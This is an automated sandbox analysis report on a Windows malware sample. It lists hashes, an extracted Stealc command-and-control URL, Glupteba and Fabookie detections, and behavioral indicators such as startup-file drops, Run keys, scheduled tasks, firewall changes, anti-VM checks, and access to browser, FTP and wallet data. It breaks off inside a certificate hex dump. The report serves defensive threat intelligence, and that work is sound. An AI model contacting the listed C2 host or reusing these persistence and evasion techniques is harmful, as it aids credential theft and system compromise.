Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2024 23:09
Behavioral task
behavioral1
Sample
2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe
Resource
win7-20231215-en
General
-
Target
2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe
-
Size
678KB
-
MD5
6c81e39fd156891a6e8bbf3d8355e54b
-
SHA1
3dba98dfcb96bed3f63e8d7524458127d1f8e877
-
SHA256
2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf
-
SHA512
664bc397ce092bc555e4a0139607bf66993e5537d13e09c2f604bbbda4be081f85e2e0b4664e8525ecdb45509082d06ff2105808b6e3707930623718d0b3c51c
-
SSDEEP
12288:cjY/CBAkfIulEPWZmmdtpTkUtBYDxnnz5/ikp3tW9zgOX4sRqG1sqAQO1:F/C6kXNlS5KkqBnqGqqAQO1
Malware Config
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/memory/2912-200-0x0000000003950000-0x0000000003A81000-memory.dmp family_fabookie behavioral2/memory/2912-263-0x0000000003950000-0x0000000003A81000-memory.dmp family_fabookie -
Glupteba payload 9 IoCs
resource yara_rule behavioral2/memory/4328-260-0x0000000002DE0000-0x00000000036CB000-memory.dmp family_glupteba behavioral2/memory/4328-261-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1588-265-0x0000000002D80000-0x000000000366B000-memory.dmp family_glupteba behavioral2/memory/1588-266-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1588-267-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4328-275-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4328-351-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1588-354-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4328-353-0x0000000002DE0000-0x00000000036CB000-memory.dmp family_glupteba -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 5152 netsh.exe 5228 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation nsr981B.tmp -
Drops startup file 9 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CI7EU0nfzi5IpP7adb5NJWhq.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lOl1qcZPaWjCX8MNoZ9qsuvI.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aTPOe0VOmhgrmpRbMBYsSEoA.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fGdGRNBdKdbn9sgTo8L92XWX.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eTB127AYHZD9inrwy9pITfN8.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t3DQn8D25H5Ya9Y3hYQ7lUPY.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VHLdKfSu7l5swAEdnHUkGZUQ.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IpLGZx1plRBe36QX6191dEb4.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bAxlSK5Mhy6Tukz9Alwgp03K.bat jsc.exe -
Executes dropped EXE 23 IoCs
pid Process 1588 EnYtZjFCPp0j2UWH9hAYujy0.exe 4328 EnX1aDs9Qrx52GFxCqLBYTqv.exe 2912 lZLbbsT4K4VwlkfF9Pt10W9z.exe 688 6dkzyHLjiRtcVYQUfmU7QR1S.exe 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 400 LBwQxwDDb7Gm8NbplPklj6ZO.exe 4664 LBwQxwDDb7Gm8NbplPklj6ZO.exe 1200 LBwQxwDDb7Gm8NbplPklj6ZO.exe 5020 LBwQxwDDb7Gm8NbplPklj6ZO.exe 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 4172 BroomSetup.exe 2972 nsr981B.tmp 432 Assistant_106.0.4998.16_Setup.exe_sfx.exe 3548 assistant_installer.exe 2296 assistant_installer.exe 5388 EnX1aDs9Qrx52GFxCqLBYTqv.exe 5412 EnYtZjFCPp0j2UWH9hAYujy0.exe 5200 XmUoKB0z5EXP4yDeUpNpxAYi.exe 1052 Install.exe 3852 Install.exe 2008 csrss.exe 5928 yDcfZLb.exe 2720 iEuELDL.exe -
Loads dropped DLL 13 IoCs
pid Process 3028 LBwQxwDDb7Gm8NbplPklj6ZO.exe 400 LBwQxwDDb7Gm8NbplPklj6ZO.exe 4664 LBwQxwDDb7Gm8NbplPklj6ZO.exe 1200 LBwQxwDDb7Gm8NbplPklj6ZO.exe 5020 LBwQxwDDb7Gm8NbplPklj6ZO.exe 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 2672 XuWl4dYFqa7cvhkX4rvdFKNi.exe 3548 assistant_installer.exe 3548 assistant_installer.exe 2296 assistant_installer.exe 2296 assistant_installer.exe 2972 nsr981B.tmp 2972 nsr981B.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/4956-0-0x00007FF7306B0000-0x00007FF7308BB000-memory.dmp upx behavioral2/memory/4956-2-0x00007FF7306B0000-0x00007FF7308BB000-memory.dmp upx behavioral2/files/0x0006000000023266-79.dat upx behavioral2/files/0x0006000000023266-85.dat upx behavioral2/memory/3028-86-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx behavioral2/files/0x0006000000023266-91.dat upx behavioral2/memory/400-92-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx behavioral2/files/0x0006000000023266-98.dat upx behavioral2/files/0x0006000000023276-101.dat upx behavioral2/memory/4664-107-0x0000000000710000-0x0000000000BF8000-memory.dmp upx behavioral2/memory/4664-105-0x0000000000710000-0x0000000000BF8000-memory.dmp upx behavioral2/files/0x0006000000023266-109.dat upx behavioral2/memory/1200-111-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx behavioral2/files/0x0006000000023266-114.dat upx behavioral2/memory/3028-168-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx behavioral2/memory/1200-170-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx behavioral2/memory/5020-171-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx behavioral2/memory/400-169-0x0000000000FD0000-0x00000000014B8000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" EnX1aDs9Qrx52GFxCqLBYTqv.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini iEuELDL.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: LBwQxwDDb7Gm8NbplPklj6ZO.exe File opened (read-only) \??\F: LBwQxwDDb7Gm8NbplPklj6ZO.exe File opened (read-only) \??\D: LBwQxwDDb7Gm8NbplPklj6ZO.exe File opened (read-only) \??\F: LBwQxwDDb7Gm8NbplPklj6ZO.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive iEuELDL.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol yDcfZLb.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini yDcfZLb.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4956 set thread context of 1800 4956 2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe 90 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN reg.exe File opened (read-only) \??\VBoxMiniRdrDN EnX1aDs9Qrx52GFxCqLBYTqv.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\VjBUDnCPU\ShjUqL.dll iEuELDL.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\rss EnX1aDs9Qrx52GFxCqLBYTqv.exe File created C:\Windows\rss\csrss.exe EnX1aDs9Qrx52GFxCqLBYTqv.exe File opened for modification C:\Windows\rss reg.exe File created C:\Windows\rss\csrss.exe reg.exe File created C:\Windows\Tasks\bLyGxHYCYhmZEhkSec.job schtasks.exe File created C:\Windows\Tasks\aKUtYNqNUJyRiHHcg.job schtasks.exe File created C:\Windows\Tasks\VeNWzXAjHYHBoCZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4560 2972 WerFault.exe 117 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nsr981B.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nsr981B.tmp -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1592 schtasks.exe 5296 schtasks.exe 4940 schtasks.exe 2884 schtasks.exe 5864 schtasks.exe 5972 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4480 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates iEuELDL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs iEuELDL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs iEuELDL.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" EnX1aDs9Qrx52GFxCqLBYTqv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 LBwQxwDDb7Gm8NbplPklj6ZO.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e LBwQxwDDb7Gm8NbplPklj6ZO.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bd